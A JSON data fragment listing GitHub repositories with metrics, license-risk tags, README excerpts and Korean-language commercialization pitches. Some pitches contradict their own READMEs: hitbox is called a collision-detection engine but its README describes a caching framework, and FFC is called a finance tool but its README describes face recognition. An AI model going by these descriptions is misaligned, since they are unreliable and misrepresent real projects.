수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융 데이터 분석 API**\n주식이나 암호화폐 가격 데이터를 빠르게 처리하고 정렬하는 백엔드 서비스로 활용 가능합","readme_excerpt":"CPPItertools\n============\nRange-based for loop add-ons inspired by the Python builtins and itertools\nlibrary. Like itertools and the Python3 builtins, this library uses lazy\nevaluation wherever possible.\n\n*Note*: Everything is inside the `iter` namespace.\n\nFollow [@cppitertools](https://twitter.com/cppitertools) for updates.\n\n#### Build and Test Status\nStatus | Compilers\n---- | ----\n[![Travis Build Status](https://travis-ci.com/ryanhaining/cppitertools.svg?branch=master)](https://app.travis-ci.com/github/ryanhaining/cppitertools) | gcc-7 gcc-8 gcc-9 clang-5.0 clang-6.0 clang-7 clang-8 clang-9\n[![Appveyor Build Status](https://ci.appveyor.com/api/projects/status/github/ryanhaining/cppitertools?svg=true)](https://ci.appveyor.com/project/ryanhaining/cppitertools) | MSVC 2017 MSVC 2019\n\n#### Table of Contents\n[range](#range)<br />\n[enumerate](#enumerate)<br />\n[zip](#zip)<br />\n[zip\\_longest](#zip)<br />\n[imap](#imap)<br />\n[filter](#filter)<br />\n[filterfalse](#filterfalse)<br />\n[unique\\","composite_score":0.1146,"license_safety_tag":"safe"},{"name":"wadackel/github-pr-diff-tree","github_url":"https://github.com/wadackel/github-pr-diff-tree","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# github-pr-diff-tree 상용화 분석\n\n## 왜 보물인가\n코드 검토 때 변경된 파일들을 한눈에 정리해서 보여주는 도구로, 소프트웨어 개발팀의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: GitHub 연동 웹앱으로 \"코드 리뷰 시간 50% 단축\" 같은 마케팅으로 개발자 구독료 수집\n2. **내부","readme_excerpt":"# github-pr-diff-tree [![CI](https://github.com/wadackel/github-pr-diff-tree/actions/workflows/ci.yml/badge.svg)](https://github.com/wadackel/github-pr-diff-tree/actions/workflows/ci.yml)\n\n![Screenshot](./screenshot.png)\n\n:evergreen_tree: This action provide a comment that displays the diff of the pull request in a tree format.\n\n## Motivation\n\nWhen we develop a product, we make various changes to the code base. For example, add, remove, edit, and rename files.\n\nThe code diffs can be seen on GitHub's excellent review page. However, the directory structure of the changed files is sometimes overlooked by reviewers.\n\nTherefore, this Action was created with the goal of improving the accuracy of the review by visualizing the directory structure of diffs included in a pull request in a Human-Readable format.\n\n## Usage\n\nSee [action.yml](./action.yml)\n\n**Basic:**\n\n```yaml\n# .github/workflows/pr-diff-tree.yml\nname: 'PR Diff Tree'\n\non:\n  pull_request:\n    types: [opened, synchronize]\n\njobs:\n  dum","composite_score":0.1144,"license_safety_tag":"safe"},{"name":"pop-os/cosmic-files","github_url":"https://github.com/pop-os/cosmic-files","stars":260,"language":"Rust","license":"GPL-3.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1144,"license_safety_tag":"restricted"},{"name":"pop-os/cosmic-settings","github_url":"https://github.com/pop-os/cosmic-settings","stars":247,"language":"Rust","license":"GPL-3.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.1144,"license_safety_tag":"restricted"},{"name":"learnbyexample/py_regular_expressions","github_url":"https://github.com/learnbyexample/py_regular_expressions","stars":45,"language":"Python","license":"MIT","abandonment_months":5,"description":"# py_regular_expressions 분석 보고서\n\n## 왜 보물인가\n텍스트 데이터에서 필요한 정보를 자동으로 찾아내고 정리하는 방법을 배울 수 있는 무료 학습 자료로, 데이터 처리가 필요한 모든 비즈니스에 활용 가치가 높습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 고객 입력 데이터를 자동으로 검증하고 정제하는 데이터 정리 플랫폼\n","readme_excerpt":"# Understanding Python re(gex)?\n\nLearn Python Regular Expressions step-by-step from beginner to advanced levels with hundreds of examples and exercises. The standard library `re` and the third-party `regex` module are covered in this book. Visit https://youtu.be/2x2n7ynamm8 for a short video about the book.\n\n<p align=\"center\"><img src=\"./images/py_regex_ls.png\" alt=\"Understanding Python re(gex)? ebook cover image\" /></p>\n\nThe book also includes exercises to test your understanding, which are presented together as a single file in this repo — [Exercises.md](./exercises/Exercises.md).\n\nFor solutions to the exercises, see [Exercise_solutions.md](./exercises/Exercise_solutions.md).\n\nYou can also use [this interactive TUI app](https://github.com/learnbyexample/TUI-apps/tree/main/PyRegexExercises) to practice most of the exercises from the book.\n\nSee [Version_changes.md](./Version_changes.md) to keep track of changes made to the book.\n\n<br>\n\n# E-book\n\n* You can purchase the pdf/epub versions","composite_score":0.1142,"license_safety_tag":"safe"},{"name":"arl/statsviz","github_url":"https://github.com/arl/statsviz","stars":12,"language":"Go","license":"MIT","abandonment_months":2,"description":"# arl/statsviz 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션의 성능을 실시간으로 모니터링할 수 있는 시각화 도구로, 복잡한 기술 없이 서버 상태를 한눈에 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트 운영 회사들이 고객에게 제공하는 성능 대시보드 기능으로 월 $9~29 추가 수익 창출\n2. **내부 업","readme_excerpt":"<div align=\"center\">\n <a href=\"https://github.com/arl/statsviz\" title=\"Statsviz's Github repository.\">\n    <img src=\"https://raw.githubusercontent.com/arl/statsviz/readme-docs/logo.png?sanitize=true\" width=\"100\" height=\"auto\"/>\n </a>\n<br>\n<br>\n<br>\n\n<p align=\"center\">\n  <a href=\"https://pkg.go.dev/github.com/arl/statsviz\" title=\"Statsviz on pkg.go.dev\">\n    <img src=\"https://pkg.go.dev/badge/github.com/arl/statsviz\" alt=\"Go Reference\">\n  </a>\n  <a href=\"https://img.shields.io/github/tag/arl/statsviz.svg\" title=\"Latest tag\">\n    <img src=\"https://img.shields.io/github/tag/arl/statsviz.svg\" alt=\"Latest tag\">\n  </a>\n  <a href=\"https://awesome.re/mentioned-badge.svg\" title=\"Mentioned in Awesome Go\">\n    <img src=\"https://awesome.re/mentioned-badge.svg\" alt=\"Mentioned in Awesome Go\">\n  </a>\n</p>\n<p align=\"center\">\n  <a href=\"https://github.com/arl/statsviz/actions\">\n    <img src=\"https://github.com/arl/statsviz/workflows/Tests-linux/badge.svg\" alt=\"Linux CI\">\n  </a>\n  <a href=\"https://githu","composite_score":0.114,"license_safety_tag":"safe"},{"name":"pop-os/cosmic-applets","github_url":"https://github.com/pop-os/cosmic-applets","stars":296,"language":"Rust","license":"GPL-3.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.114,"license_safety_tag":"restricted"},{"name":"adamchainz/time-machine","github_url":"https://github.com/adamchainz/time-machine","stars":5,"language":"Python","license":"MIT","abandonment_months":0,"description":"# time-machine 저장소 분석\n\n## 왜 보물인가\n시간을 자유자재로 조종하여 소프트웨어 테스트를 정확하게 검증할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 일정 기반 구독 갱신, 만료일 관리 등 시간 의존적 기능을 정확히 테스트하는 AI 자동화 플랫폼\n2. **내부 업무 도구**: 금융사의 이자 계산, 정산 시스","readme_excerpt":"============\ntime-machine\n============\n\n.. image:: https://img.shields.io/readthedocs/time-machine?style=for-the-badge\n   :target: https://time-machine.readthedocs.io/en/latest/\n\n.. image:: https://img.shields.io/github/actions/workflow/status/adamchainz/time-machine/main.yml.svg?branch=main&style=for-the-badge\n   :target: https://github.com/adamchainz/time-machine/actions?workflow=CI\n\n.. image:: https://img.shields.io/badge/Coverage-100%25-success?style=for-the-badge\n   :target: https://github.com/adamchainz/time-machine/actions?workflow=CI\n\n.. image:: https://img.shields.io/pypi/v/time-machine.svg?style=for-the-badge\n   :target: https://pypi.org/project/time-machine/\n\n.. image:: https://img.shields.io/badge/code%20style-black-000000.svg?style=for-the-badge\n   :target: https://github.com/psf/black\n\n.. image:: https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit&logoColor=white&style=for-the-badge\n   :target: https://github.com/pre-commit/pre-commit\n   :alt: pre","composite_score":0.1134,"license_safety_tag":"safe"},{"name":"yzhang921/CBoard","github_url":"https://github.com/yzhang921/CBoard","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":6,"description":"# CBoard 분석 보고서\n\n## 왜 보물인가\n누구나 쉽게 데이터를 시각화하고 대시보드를 만들 수 있는 오픈소스 도구로, 기업이 복잡한 정보를 한눈에 이해할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 중소기업 대시보드 솔루션**\n- 업체별 판매 현황, 고객 분석, 재고 현황 등을 실시간으로 보여주는 웹 서비스로 월정액 판","readme_excerpt":"## CBoard\nCBoard is not only a analysis platform that supports interactive multi-dimensional report design and data analysis for user, but also a BI product development platform for developer.\nPowered by [Shanhai Chuguo Information and Technology Co., Ltd.](http://www.chuguotech.com/)\n- **Normal User** can analysis your data or design a report by simple drag and drop operation\n- **Developer** can extend any type of your data datasource that you can connect by Java program\n\n<div style=\"text-align:center\">\n  <img class=\"img-responsive\" src=\"https://user-images.githubusercontent.com/6037522/42865027-ef625120-8a9a-11e8-9982-50630902d263.png\"  />\n</div>\n\n## Who is using CBoard\nIf you wish your company's logo show on our home page, please [sign in here](https://github.com/TuiQiao/CBoard/issues/122) provide a logo pic with transparent background\n<div style=\"text-align:center\">\n  <img class=\"img-responsive\" src=\"https://user-images.githubusercontent.com/6037522/42865039-fd217ad4-8a9a-11e8-9762","composite_score":0.1134,"license_safety_tag":"safe"},{"name":"RichardKnop/machinery","github_url":"https://github.com/RichardKnop/machinery","stars":9,"language":"Go","license":"mpl-2.0","abandonment_months":6,"description":"# RichardKnop/machinery 상용화 분석\n\n## 왜 보물인가\n복잡한 작업을 자동으로 처리해주는 시스템으로, 대규모 온라인 서비스가 수천 개의 요청을 동시에 처리할 때 필수적인 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 이메일 발송 SaaS**\n- 수백만 명의 고객에게 동시에 이메일을 보내는 마케팅 회사들이 구독료를 지불하고 사용","readme_excerpt":"[1]: https://raw.githubusercontent.com/RichardKnop/assets/master/machinery/example_worker.png\n[2]: https://raw.githubusercontent.com/RichardKnop/assets/master/machinery/example_worker_receives_tasks.png\n[3]: http://patreon_public_assets.s3.amazonaws.com/sized/becomeAPatronBanner.png\n\n## Machinery\n\nMachinery is an asynchronous task queue/job queue based on distributed message passing.\n\n[![godoc for RichardKnop/machinery](https://godoc.org/github.com/nathany/looper?status.svg)](http://godoc.org/github.com/RichardKnop/machinery/v1)\n[![codecov for RichardKnop/machinery](https://codecov.io/gh/RichardKnop/machinery/branch/master/graph/badge.svg)](https://codecov.io/gh/RichardKnop/machinery)\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/RichardKnop/machinery)](https://goreportcard.com/report/github.com/RichardKnop/machinery)\n[![OpenTracing Badge](https://img.shields.io/badge/OpenTracing-enabled-blue.svg)](http://opentracing.io)\n\n[![Sourcegraph for RichardKnop/machinery](https:","composite_score":0.1133,"license_safety_tag":"unknown"},{"name":"Valloric/YouCompleteMe","github_url":"https://github.com/Valloric/YouCompleteMe","stars":8,"language":"Python","license":"gpl-3.0","abandonment_months":0,"description":"# YouCompleteMe 저장소 분석\n\n## 왜 보물인가\n프로그래머가 코드를 작성할 때 자동으로 다음 단어를 제안해주는 '자동완성 기능'을 만드는 기술로, 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초보자가 더 쉽게 코드를 작성할 수 있도록 자동완성 기능을 내장한 웹 기반 코딩 학습 서비스\n","readme_excerpt":"YouCompleteMe: a code-completion engine for Vim\n===============================================\n\n[![Gitter room](https://img.shields.io/gitter/room/Valloric/YouCompleteMe.svg)](https://gitter.im/Valloric/YouCompleteMe)\n[![Build status](https://dev.azure.com/YouCompleteMe/YCM/_apis/build/status/ycm-core.YouCompleteMe?branchName=master)](https://dev.azure.com/YouCompleteMe/YCM/_build?definitionId=3&branchName=master)\n[![Coverage status](https://img.shields.io/codecov/c/github/ycm-core/YouCompleteMe/master.svg)](https://codecov.io/gh/ycm-core/YouCompleteMe)\n\nHelp, Advice, Support\n---------------------\n\nLooking for help, advice, or support? Having problems getting YCM to work?\n\nFirst carefully read the [installation instructions](#installation) for your OS.\nWe recommend you use the supplied `install.py` - the \"full\" installation guide\nis for rare, advanced use cases and most users should use `install.py`.\n\nIf the server isn't starting and you're getting a \"YouCompleteMe unavailable\"\nerror,","composite_score":0.1133,"license_safety_tag":"restricted"},{"name":"dani-garcia/bitwarden_rs","github_url":"https://github.com/dani-garcia/bitwarden_rs","stars":5,"language":"Rust","license":"AGPL-3.0","abandonment_months":0,"description":"# bitwarden_rs 사업화 분석\n\n## 왜 보물인가\n비용 없이 비밀번호를 안전하게 관리해주는 서비스를 직접 운영할 수 있는 핵심 기술이므로, 기업들이 민감한 데이터를 외부에 맡기지 않고 자체 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 중소기업의 직원들이 회사 계정과 비밀번호를 안전하게 공유·관리하는 플랫폼\n2. *","readme_excerpt":"![Vaultwarden Logo](./resources/vaultwarden-logo-auto.svg)\n\nAn alternative server implementation of the Bitwarden Client API, written in Rust and compatible with [official Bitwarden clients](https://bitwarden.com/download/) [[disclaimer](#disclaimer)], perfect for self-hosted deployment where running the official resource-heavy service might not be ideal.\n\n---\n\n[![GitHub Release](https://img.shields.io/github/release/dani-garcia/vaultwarden.svg?style=for-the-badge&logo=vaultwarden&color=005AA4)](https://github.com/dani-garcia/vaultwarden/releases/latest)\n[![ghcr.io Pulls](https://img.shields.io/badge/dynamic/json?style=for-the-badge&logo=github&logoColor=fff&color=005AA4&url=https%3A%2F%2Fipitio.github.io%2Fbackage%2Fdani-garcia%2Fvaultwarden%2Fvaultwarden.json&query=%24.downloads&label=ghcr.io%20pulls&cacheSeconds=14400)](https://github.com/dani-garcia/vaultwarden/pkgs/container/vaultwarden)\n[![Docker Pulls](https://img.shields.io/docker/pulls/vaultwarden/server.svg?style=for-the-badg","composite_score":0.1131,"license_safety_tag":"risky"},{"name":"lhc70000/iina","github_url":"https://github.com/lhc70000/iina","stars":13,"language":"Swift","license":"gpl-3.0","abandonment_months":0,"description":"# lhc70000/iina 프로젝트 분석\n\n## 왜 보물인가\n동영상 재생이 필요한 모든 애플리케이션에 자유롭게 심을 수 있는 강력한 영상 처리 엔진입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 영상 편집 플랫폼에서 고급 영상 재생 및 처리 기능 제공\n2. **내부 업무 도구**: 기업의 영상 자산 관리 및 분석 시스템의 핵심 ","readme_excerpt":"<p align=\"center\">\n<img height=\"256\" src=\"https://github.com/iina/iina/raw/master/iina/Assets.xcassets/AppIcon.appiconset/icon_512x512.png\">\n</p>\n\n<h1 align=\"center\">IINA</h1>\n\n<p align=\"center\">IINA is the <b>modern</b> video player for macOS.</p>\n\n<p align=\"center\">\n<a href=\"https://iina.io/\">Website</a> ·\n<a href=\"https://github.com/iina/iina/releases\">Releases</a> ·\n<a href=\"https://t.me/IINAUsers\">Telegram Group</a>\n</p>\n\n---\n[![Crowdin](https://badges.crowdin.net/iina/localized.svg)](https://crowdin.com/project/iina)\n## Features\n\n* Based on [mpv](https://github.com/mpv-player/mpv), which provides the best decoding capacity on macOS\n* Designed with modern versions of macOS (11.0+) in mind\n* All the features you need for video and music: subtitles, playlists, chapters…and much, much more!\n* Force Touch, picture-in-picture and advanced Touch Bar support\n* Customizable user interface including multiple color schemes and on screen controller (OSC) layout positioning\n* Standalone Music","composite_score":0.1131,"license_safety_tag":"restricted"},{"name":"tiandunx/FFC","github_url":"https://github.com/tiandunx/FFC","stars":7,"language":"Python","license":"MIT","abandonment_months":6,"description":"# tiandunx/FFC 분석 보고서\n\n## 왜 보물인가\n금융 데이터 처리와 분석을 자동화해주는 도구로, 수작업으로 처리하던 복잡한 금융 업무를 빠르게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **금융 데이터 분석 SaaS**: 중소 투자사나 회계사무소에 월 구독형으로 판매하여 클라이언트 재무 데이터를 자동 분석\n2. **은행/증권사 내부 도","readme_excerpt":"# Fast Face Classification (F²C)—— An Efficient Training Approach for Very Large Scale Face Recognition (CVPR2022)\n                          Kai Wang*, Shuo Wang*, Panpan Zhang, Zhipeng Zhou, Zheng Zhu, Xiaobo Wang, Xiaojiang Peng, \n\t\t\t\t\t\t   Baigui Sun, Hao Li\n\t\t\t\t\t\t\t Yang You\n                  National University of Singapore, Alibaba DAMO Academy, Tsinghua University, Institute of Automation, Chinese Academy of Sciences, Shenzhen Technology University\n\t\t\t        Kai Wang and Shuo Wang are equally-contributted authors\n***Abstract***\nTraining on ultra-large-scale datasets is time-consuming and takes up a lot of hardware resource. Therefore so we design a dul-data loaders and dynamic class pool to deal with large-scale face classification. For more details, please refer to our [paper](https://arxiv.org/pdf/2105.10375.pdf)\n\n***Pipeline***\n\n![Arch](resource/pipeline.png)\n### Preparation\nAs FFC contains LRU module, so you may use lru_python_impl.py or instead \ncompile the code under lru_c ","composite_score":0.1131,"license_safety_tag":"safe"},{"name":"sysnexus1/polymarket-arbitrage-bot","github_url":"https://github.com/sysnexus1/polymarket-arbitrage-bot","stars":99,"language":"TypeScript","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.1131,"license_safety_tag":"unknown"},{"name":"smcameron/space-nerds-in-space","github_url":"https://github.com/smcameron/space-nerds-in-space","stars":5,"language":"C","license":"gpl-2.0","abandonment_months":6,"description":"# Space Nerds in Space 저장소 분석\n\n## 왜 보물인가\n우주 배경의 멀티플레이어 게임을 직접 만들고 운영할 수 있는 완성된 게임 엔진으로, 개발사들이 처음부터 게임을 만드는 수고를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **우주 테마 게임 SaaS**: 웹 기반 우주 배틀 게임을 구독형으로 운영하며 월간 이용료 수익화\n2","readme_excerpt":"\n[Space Nerds In Space](https://smcameron.github.io/space-nerds-in-space/ \"Space Nerds In Space website\")\nis an open source multiplayer networked spaceship bridge\nsimulator game inspired by another game called \"Artemis Spaceship Bridge Simulator\"\nIt is still a work in progress, but it is substantially far along, and reasonably\nfree of bugs as far as I know (the game should not crash, in other words.)\n\nHere is some video from February 2019, at HackRVA in Richmond, Virginia:\n\n[![Watch the video](https://img.youtube.com/vi/3fFl0VH-4zA/hqdefault.jpg)](https://www.youtube.com/watch?v=3fFl0VH-4zA)\n\nFeatures:\n\n* Terminals for Navigation, Weapons, Engineering, Damage Control,\n  Comms, Science, and Game Master.\n* Multi-crew (multiple bridges) supported\n* Terminals may join/leave/re-join games at any time.\n* Asteroid mining\n* Bounty hunting\n* Travel between instances of the game via warp gates in an arbitrarily\n  large universe of solar systems.\n* Dock at starbases to repair your ship, buy/sell ","composite_score":0.1129,"license_safety_tag":"restricted"},{"name":"WGrape/lexer","github_url":"https://github.com/WGrape/lexer","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":6,"description":"# WGrape/lexer 상용화 분석\n\n## 왜 보물인가\n텍스트를 컴퓨터가 이해할 수 있는 형태로 변환하는 핵심 기술로, 검색엔진·번역기·채팅봇 등 거의 모든 언어처리 서비스의 기초가 되는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: AI 기반 문서 분석 플랫폼**\n- 계약서·영수증 자동 분석 서비스로 기업 고객에게 월 구독료 수집","readme_excerpt":"<p align=\"center\">\n<img width=\"300\" alt=\"image\" src=\"https://user-images.githubusercontent.com/35942268/226105723-86eb3042-fb51-4f51-b382-b833a952e9a2.png\">\n</p>\n\n<p align=\"center\">\n   <a href=\"https://www.oscs1024.com/project/oscs/WGrape/lexer?ref=badge_small\" alt=\"OSCS Status\"><img src=\"https://www.oscs1024.com/platform/badge/WGrape/lexer.svg?size=small\"/></a>\n    <img src=\"https://img.shields.io/badge/JavaScript-ES5+-blue.svg\">\n    <img src=\"https://img.shields.io/npm/dt/chain-lexer.svg\">\n    <a href=\"https://app.travis-ci.com/github/WGrape/lexer\"><img src=\"https://app.travis-ci.com/WGrape/lexer.svg?branch=main\"><a>\n    <img alt=\"GitHub release (latest by date)\" src=\"https://img.shields.io/github/v/release/wgrape/lexer\">\n    <img src=\"https://img.shields.io/badge/Document-中文/English-orange.svg\">\n    <img src=\"https://img.shields.io/badge/License-MIT-green.svg\">   \n</p>\n\n<div align=\"center\">    \n    <p>It is a lexical analyzer based on DFA that is built using JS and supports multi-la","composite_score":0.1128,"license_safety_tag":"safe"},{"name":"ssup2/kpexec","github_url":"https://github.com/ssup2/kpexec","stars":6,"language":"Go","license":"MIT","abandonment_months":6,"description":"# kpexec 저장소 분석\n\n## 왜 보물인가\n컨테이너 환경에서 프로그램을 더 안전하고 효율적으로 실행할 수 있는 핵심 기술로, 클라우드 서비스 회사들이 필수적으로 필요로 하는 인프라 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 서비스**: AWS, Google Cloud 같은 대형 클라우드 업체의 컨테이너 실행 환경 개선에 통합\n2. **","readme_excerpt":"# kpexec\n\n![kpexec Demo](image/kpexec_Demo.gif)\n\n**kpexec** is a K8s cli that runs commands in a container with high privileges **without SSH**. It runs a highly privileged container on the same node as the target container and joins into the namespaces of the target container (IPC, UTS, PID, net, mount). This is useful for debugging where you often need to execute commands with high privileges. Also, kpexec has a **tools mode**, which adds useful debugging tools into the debugged container. The tools mode is useful when there necessary debugging tools are missing in the target container.\n\nIn contrast, kubectl-exec runs the command with the same privileges as the container. For example, if a container does not have network privileges, the command executed by kubectl-exec also has no network privileges. This makes debugging the pod difficult. If you use kpexec instead of kubectl-exec, you can easily get high privileges for debugging.\n\nkpexec now supports the following container runtimes","composite_score":0.1124,"license_safety_tag":"safe"},{"name":"microsoft/Git-Credential-Manager-Core","github_url":"https://github.com/microsoft/Git-Credential-Manager-Core","stars":5,"language":"C#","license":"NOASSERTION","abandonment_months":0,"description":"# Git-Credential-Manager-Core 분석 보고서\n\n## 왜 보물인가\n깃허브나 회사 시스템에 로그인할 때 매번 비밀번호를 입력하지 않아도 되게 해주는 마이크로소프트의 핵심 보안 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 협업 도구**: 직원들이 내부 코드 저장소에 쉽고 안전하게 접근할 수 있는 SaaS 플랫폼\n2. **IT 보안","readme_excerpt":"# Git Credential Manager\n\n[![Build Status][build-status-badge]][workflow-status]\n\n---\n\n[Git Credential Manager][gcm] (GCM) is a secure\n[Git credential helper][git-credential-helper] built on [.NET][dotnet] that runs\non Windows, macOS, and Linux. It aims to provide a consistent and secure\nauthentication experience, including multi-factor auth, to every major source\ncontrol hosting service and platform.\n\nGCM supports (in alphabetical order) [Azure DevOps][azure-devops], Azure DevOps\nServer (formerly Team Foundation Server), Bitbucket, GitHub, and GitLab.\nCompare to Git's [built-in credential helpers][git-tools-credential-storage]\n(Windows: wincred, macOS: osxkeychain, Linux: gnome-keyring/libsecret), which\nprovide single-factor authentication support for username/password only.\n\nGCM replaces both the .NET Framework-based\n[Git Credential Manager for Windows][gcm-for-windows] and the Java-based\n[Git Credential Manager for Mac and Linux][gcm-for-mac-and-linux].\n\n## Install\n\nSee the [install","composite_score":0.1123,"license_safety_tag":"unknown"},{"name":"yarnpkg/yarn","github_url":"https://github.com/yarnpkg/yarn","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":0,"description":"# Yarn 저장소 분석\n\n## 왜 보물인가\n전 세계 개발자들이 프로젝트를 관리할 때 필요한 핵심 도구로, 6,000개 이상의 다른 프로젝트에서 의존하고 있는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 도구 SaaS**: 온라인 코딩 환경이나 클라우드 개발 플랫폼에 Yarn을 통합하여 사용자가 브라우저에서 바로 프로젝트를 관리하도록 제공","readme_excerpt":"> ## ℹ️ Important note\n> \n> This repository holds the sources for Yarn 1.x (latest version at the time of this writing being 1.22). New releases (at this time the 3.2.3, although we're currently working on our next major) are tracked on the [yarnpkg/berry](https://github.com/yarnpkg/berry) repository, this one here being mostly kept for historical purposes and the occasional hotfix we publish to make the migration from 1.x to later releases easier.\n> \n> If you hit bugs or issues with Yarn 1.x, we strongly suggest you [migrate](https://yarnpkg.com/getting-started/migration) to the latest release - at this point they have been maintained longer than 1.x, and many classes of problems have already been addressed there. By using the [`nodeLinker` setting](https://yarnpkg.com/configuration/yarnrc#nodeLinker) you'll also have the choice of how you want to install your packages: node_modules like npm, symlinks like pnpm, or manifest files via [Yarn PnP](https://yarnpkg.com/features/pnp).\n\n---\n","composite_score":0.1121,"license_safety_tag":"unknown"},{"name":"hit-box/hitbox","github_url":"https://github.com/hit-box/hitbox","stars":12,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# hit-box/hitbox 분석 보고서\n\n## 왜 보물인가\n컴퓨터가 주변 공간을 인식하는 기술로, 게임·로봇·자동화 산업에서 필수적인 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 SaaS**: 인디 게임 개발자들이 구독하는 클라우드 기반 충돌 감지 엔진 서비스\n2. **배송 로봇 업체 API**: 택배 자동배송 로봇이 장애물을 피하","readme_excerpt":"# Hitbox\n\n[![Build status](https://github.com/hit-box/hitbox/actions/workflows/CI.yml/badge.svg)](https://github.com/hit-box/hitbox/actions?query=workflow)\n[![Coverage Status](https://codecov.io/gh/hit-box/hitbox/branch/main/graph/badge.svg?token=tgAm8OBLkY)](https://codecov.io/gh/hit-box/hitbox)\n[![MIT licensed](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)\n[![Blog](https://img.shields.io/badge/blog-hitbox.rs-orange)](https://blog.hitbox.rs/)\n\nHighly customizable async caching framework for Rust designed for high-performance applications.\n\nProtocol-agnostic async core + first-class HTTP support via hitbox-http. Pluggable backends from in-memory to distributed solutions such as Redis. Built on tower, works with any tokio-based service.\n\nThere are several common approaches to caching. The first is a low-level approach where you work directly with a cache instance, calling `get`, `set`, and `delete` methods and deciding exactly when and where to use them in your code. The ","composite_score":0.1121,"license_safety_tag":"safe"},{"name":"system76/firmware-update","github_url":"https://github.com/system76/firmware-update","stars":50,"language":"Rust","license":"GPL-3.0","abandonment_months":1,"description":"# System76 펌웨어 업데이트 분석\n\n## 왜 보물인가\n컴퓨터 내부 소프트웨어를 안전하게 업데이트하는 도구로, 기술 지원이 필요한 중소기업과 기관들이 자동화된 관리 솔루션을 찾고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업의 컴퓨터 fleet을 원격으로 관리하고 보안 업데이트를 자동 배포하는 클라우드 서비스\n- **내부 업무","readme_excerpt":"# System76 Firmware Update\n\nfirmware-update is a UEFI application for applying firmware updates on System76\nproducts.\n\nIt is used by [firmware-open](https://github.com/system76/firmware-open) and\nthe private **firmware** project.\n\n## Flashing firmware\n\nfirmware-update expects the firmware images to have specific names:\n\n- `firmware.rom`: SBIOS firmware\n- `firmware.cap`: UEFI capsule image\n- `ec.rom`: Embedded controller firmware\n\nThe mechanism used to apply updates depends on the firmware image:\n\n- coreboot-based system firmware: [intel-spi](https://github.com/system76/intel-spi)\n- System76 EC: [ectool](https://github.com/system76/ec)\n- Proprietary: Vendor-provided tools\n","composite_score":0.1119,"license_safety_tag":"restricted"},{"name":"yannickcr/eslint-plugin-react","github_url":"https://github.com/yannickcr/eslint-plugin-react","stars":7,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# eslint-plugin-react 상업화 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 코드 실수를 자동으로 찾아주는 검사 도구로, 품질 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발팀용 코드 품질 관리 플랫폼에 통합하여 자동 검사 기능 제공\n2. **내부 업무 도구**: 대규모 IT기업의","readme_excerpt":"# `eslint-plugin-react` <sup>[![Version Badge][npm-version-svg]][package-url]</sup>\n\n===================\n\n[![github actions][actions-image]][actions-url]\n[![Maintenance Status][status-image]][status-url]\n[![NPM version][npm-image]][npm-url]\n[![Tidelift][tidelift-image]][tidelift-url]\n\nReact specific linting rules for `eslint`\n\n## Installation\n\n```sh\nnpm install eslint eslint-plugin-react --save-dev\n```\n\nIt is also possible to install ESLint globally rather than locally (using `npm install -g eslint`). However, this is not recommended, and any plugins or shareable configs that you use must be installed locally in either case.\n\n## Configuration (legacy: `.eslintrc*`) <a id=\"configuration\"></a>\n\nUse [our preset](#recommended) to get reasonable defaults:\n\n```json\n  \"extends\": [\n    \"eslint:recommended\",\n    \"plugin:react/recommended\"\n  ]\n```\n\nIf you are using the [new JSX transform from React 17](https://reactjs.org/blog/2020/09/22/introducing-the-new-jsx-transform.html#removing-unused-rea","composite_score":0.1115,"license_safety_tag":"safe"},{"name":"CompuIves/codesandbox-client","github_url":"https://github.com/CompuIves/codesandbox-client","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":1,"description":"# CodeSandbox Client 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 바로 프로그래밍을 배우고 실행할 수 있는 플랫폼의 핵심 기술로, 프로그래밍 진입장벽을 획기적으로 낮출 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 학생들이 설치 없이 즉시 프로그래밍을 배울 수 있는 SaaS 서비스\n2. **회사 내 프로","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://codesandbox.io\">\n    <img src=\"https://codesandbox.io/static/img/banner.png?v=2\" height=\"300px\">\n  </a>\n</p>\n\n&nbsp;\n\n[![All 